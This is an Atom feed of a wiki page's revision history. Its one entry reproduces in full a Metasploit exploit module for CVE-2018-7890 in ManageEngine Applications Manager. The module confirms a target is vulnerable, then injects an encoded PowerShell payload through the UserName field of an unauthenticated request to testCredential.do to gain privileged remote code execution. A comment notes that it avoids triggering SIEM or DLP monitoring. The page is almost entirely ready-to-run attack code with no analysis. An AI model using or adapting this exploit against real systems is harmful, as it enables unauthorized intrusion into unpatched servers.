<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=CVE-2018-7890_ManageEngine_Application_Manager_%E9%81%A0%E7%A8%8B%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E</id>
	<title>CVE-2018-7890 ManageEngine Application Manager 遠程命令執行漏洞 - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=CVE-2018-7890_ManageEngine_Application_Manager_%E9%81%A0%E7%A8%8B%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=CVE-2018-7890_ManageEngine_Application_Manager_%E9%81%A0%E7%A8%8B%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&amp;action=history"/>
	<updated>2026-04-15T06:34:20Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=CVE-2018-7890_ManageEngine_Application_Manager_%E9%81%A0%E7%A8%8B%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&amp;diff=1527&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;==MSFEXP== &lt;pre&gt; ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ##  class MetasploitModu...&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=CVE-2018-7890_ManageEngine_Application_Manager_%E9%81%A0%E7%A8%8B%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&amp;diff=1527&amp;oldid=prev"/>
		<updated>2021-04-11T02:05:49Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;==MSFEXP== &amp;lt;pre&amp;gt; ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ##  class MetasploitModu...&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;==MSFEXP==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
##&lt;br /&gt;
# This module requires Metasploit: http://metasploit.com/download&lt;br /&gt;
# Current source: https://github.com/rapid7/metasploit-framework&lt;br /&gt;
##&lt;br /&gt;
&lt;br /&gt;
class MetasploitModule &amp;lt; Msf::Exploit::Remote&lt;br /&gt;
  Rank = ExcellentRanking&lt;br /&gt;
&lt;br /&gt;
  include Msf::Exploit::Remote::HttpClient&lt;br /&gt;
  include Msf::Exploit::Powershell&lt;br /&gt;
&lt;br /&gt;
  def initialize(info = {})&lt;br /&gt;
    super(update_info(info,&lt;br /&gt;
      'Name'           =&amp;gt; &amp;quot;ManageEngine Applications Manager Remote Code Execution&amp;quot;,&lt;br /&gt;
      'Description'    =&amp;gt; %q(&lt;br /&gt;
        This module exploits command injection vulnerability in the ManageEngine Application Manager product.&lt;br /&gt;
        An unauthenticated user can execute a operating system command under the context of privileged user.&lt;br /&gt;
&lt;br /&gt;
        Publicly accessible testCredential.do endpoint takes multiple user inputs and validates supplied credentials&lt;br /&gt;
        by accessing given system. This endpoint calls a several internal classes and then executes powershell script&lt;br /&gt;
        without validating user supplied parameter when the given system is OfficeSharePointServer.&lt;br /&gt;
      ),&lt;br /&gt;
      'License'        =&amp;gt; MSF_LICENSE,&lt;br /&gt;
      'Author'         =&amp;gt;&lt;br /&gt;
        [&lt;br /&gt;
          'Mehmet Ince &amp;lt;mehmet@mehmetince.net&amp;gt;' # author &amp;amp; msf module&lt;br /&gt;
        ],&lt;br /&gt;
      'References'     =&amp;gt;&lt;br /&gt;
        [&lt;br /&gt;
          ['CVE', '2018-7890'],&lt;br /&gt;
          ['BID', '103358'],&lt;br /&gt;
          ['URL', 'https://pentest.blog/advisory-manageengine-applications-manager-remote-code-execution-sqli-and/'],&lt;br /&gt;
          ['URL', 'https://pitstop.manageengine.com/portal/community/topic/security-vulnerability-issues-fixed-upgrade-to-the-latest-version-of-applications-manager']&lt;br /&gt;
        ],&lt;br /&gt;
      'DefaultOptions' =&amp;gt;&lt;br /&gt;
        {&lt;br /&gt;
          'WfsDelay' =&amp;gt; 10,&lt;br /&gt;
          'RPORT' =&amp;gt; 9090&lt;br /&gt;
        },&lt;br /&gt;
      'Payload' =&amp;gt;&lt;br /&gt;
        {&lt;br /&gt;
          'BadChars' =&amp;gt; &amp;quot;\x22&amp;quot;&lt;br /&gt;
        },&lt;br /&gt;
      'Platform'       =&amp;gt; ['win'],&lt;br /&gt;
      'Arch'           =&amp;gt; [ARCH_X86, ARCH_X64],&lt;br /&gt;
      'Targets'        =&amp;gt; [['Automatic', {}]],&lt;br /&gt;
      'Privileged'     =&amp;gt; true,&lt;br /&gt;
      'DisclosureDate' =&amp;gt; 'Mar 7 2018',&lt;br /&gt;
      'DefaultTarget'  =&amp;gt; 0))&lt;br /&gt;
&lt;br /&gt;
    register_options(&lt;br /&gt;
      [&lt;br /&gt;
        OptString.new('TARGETURI', [true, 'The URI of the application', '/'])&lt;br /&gt;
      ]&lt;br /&gt;
    )&lt;br /&gt;
  end&lt;br /&gt;
&lt;br /&gt;
  def check&lt;br /&gt;
    res = trigger_endpoint(Rex::Text.rand_text_alpha(3))&lt;br /&gt;
    if res &amp;amp;&amp;amp; res.body.include?('Kindly check the credentials and try again')&lt;br /&gt;
      Exploit::CheckCode::Vulnerable&lt;br /&gt;
    else&lt;br /&gt;
      Exploit::CheckCode::Safe&lt;br /&gt;
    end&lt;br /&gt;
  end&lt;br /&gt;
&lt;br /&gt;
  def exploit&lt;br /&gt;
    fail_with(Failure::NotVulnerable, 'Target is not vulnerable.') unless check == Exploit::CheckCode::Vulnerable&lt;br /&gt;
&lt;br /&gt;
    powershell_options = {&lt;br /&gt;
      encode_final_payload: true,&lt;br /&gt;
      remove_comspec: true&lt;br /&gt;
    }&lt;br /&gt;
    p = cmd_psh_payload(payload.encoded, payload_instance.arch.first, powershell_options)&lt;br /&gt;
&lt;br /&gt;
    print_status('Triggering the vulnerability')&lt;br /&gt;
&lt;br /&gt;
    trigger_endpoint(&amp;quot;$(#{p})&amp;quot;)&lt;br /&gt;
  end&lt;br /&gt;
&lt;br /&gt;
  def trigger_endpoint(username)&lt;br /&gt;
    send_request_cgi(&lt;br /&gt;
      'method' =&amp;gt; 'POST',&lt;br /&gt;
      'uri' =&amp;gt; normalize_uri(target_uri.path, 'testCredential.do'),&lt;br /&gt;
      'vars_post' =&amp;gt; {&lt;br /&gt;
        'method' =&amp;gt; 'testCredentialForConfMonitors',&lt;br /&gt;
        'type' =&amp;gt; 'OfficeSharePointServer',&lt;br /&gt;
        'montype' =&amp;gt; 'OfficeSharePointServer',&lt;br /&gt;
        'isAgentEnabled' =&amp;gt; 'NO',&lt;br /&gt;
        'isAgentAssociated' =&amp;gt; 'false',&lt;br /&gt;
        'displayname' =&amp;gt; Rex::Text.rand_text_alpha(rand(10..15)),&lt;br /&gt;
        'HostName' =&amp;gt; '127.0.0.1', # Try to access random IP address or domain may trigger SIEMs or DLP systems...&lt;br /&gt;
        'Powershell' =&amp;gt; 'True', # :-)&lt;br /&gt;
        'CredSSP' =&amp;gt; 'False',&lt;br /&gt;
        'SPType' =&amp;gt; 'SPServer',&lt;br /&gt;
        'CredentialDetails' =&amp;gt; 'nocm',&lt;br /&gt;
        'Password' =&amp;gt; Rex::Text.rand_text_alpha(3),&lt;br /&gt;
        'UserName' =&amp;gt; username&lt;br /&gt;
      }&lt;br /&gt;
    )&lt;br /&gt;
  end&lt;br /&gt;
end&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>